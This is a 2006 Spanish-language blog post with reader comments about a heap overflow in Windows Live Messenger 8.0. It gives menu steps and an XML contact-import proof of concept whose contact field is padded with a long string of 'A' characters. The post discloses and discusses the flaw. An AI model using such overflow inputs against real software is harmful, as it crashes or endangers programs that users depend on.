Windows Messenger 8.0 ~ Userlinux.net

Windows Messenger 8.0

27.Jun.2006 ~ 4 Comentarios ~ 2209 Lecturas

Sigo sin entender que este tipo de vulnerabilidades, bugs o como querais llamarlo sigan teniendo efecto en pleno 2k6. Y más aún con un producto relativamente nuevo (no creo que llegue a 15 días desde su aparición) de una empresa como La Innombrable teniendo -supongo- todo un equipo de seguridad detrás de sus creaciones.

El afectado en este caso es el Windows Live Messenger 8.0 con un heap overflow estúpido pero -parece ser- efectivo. Podeis probar el exploit de la siguiente forma:

Messenger => Menu => Contact => Import Instant Messaging Contacts =>
Select CLexploits.ctt

Como vemos, el código XML para la importación de contactos no tiene demasiada chicha:

<?xml version="1.0"?>
<messenger>
  <service name=".NET Messenger Service">
    <contactlist>
      <contact>AAAAAA[MUCHAS_MAS_AES]AAAAAAAAAAAAAAAA@hotmail.com</contact>
    </contactlist>
  </service>
</messenger>

Me sorprende que este tipo de fallos sigan de moda, bien es cierto que estoy bastante off en programación, pero son técnicas de hace años que se deberían haber corregido. Aunque tratándose de quien se trata...

Categorías: programación

Tags: seguridad

Comentarios

reidrac

27.Jun.2006

Es que además el sistema operativo donde funciona no ayuda.

Hace años que no programo nada en windows, pero recuerdo que reservar memoria a veces ocultaba este tipo de errores (bueno, más bien buffer overflow que heap overflow) porque dependiendo del sistema (en win98 no pasaba en win2k sí) te daba más memoria de la que pedías redondeando a una página de 4kb.

Claro... tenías un error en el programa, pero si daba la casualidad de que "te pasabas" y caías en esa zona de memoria "de más", el error pasaba desapercibido.

Desde luego ya podrían pasar un mejor control de calidad a los programas (¿esta petada es en una beta?), ya que dicen que es una de las ventajas que tiene el soft privativo sobre el software libre (jua jua).

movil

27.Jun.2006

estoy de acuerdo con reidrac XD

Jocker

28.Jun.2006

La única ventaja que tiene el software privativo, es que para el responsable de la random(área) en cuestión, es un alivio saber que si algo gripa de forma desmesurada puede coger el teléfono y hacer venir a quien haga falta si la empresa es de mediano renombre, y en caso de no encontrar la solución culpar a la empresa vendedora de ese software delante de sus superiores que por supuesto, sólo entienden que han pagado x mil/millones de euros por algo que TIENE que funcionar (totalmente lógico).
Resumiendo, que la apuesta de las empresas por un software privativo es algo más por temas de salvar culos que por confianza corporativa... bueno, todo esto como siempre imho. Saludo a mis admiradoras que también apuntan a null xD

juan

20.Jun.2008

esta reeee buenoooooooooooo

Comentarios

Los comentarios están cerrados: los comentarios se cierran automáticamente una vez pasados 15 días. Si quieres comentar algo acerca de la anotación, puedes hacerlo por e-mail.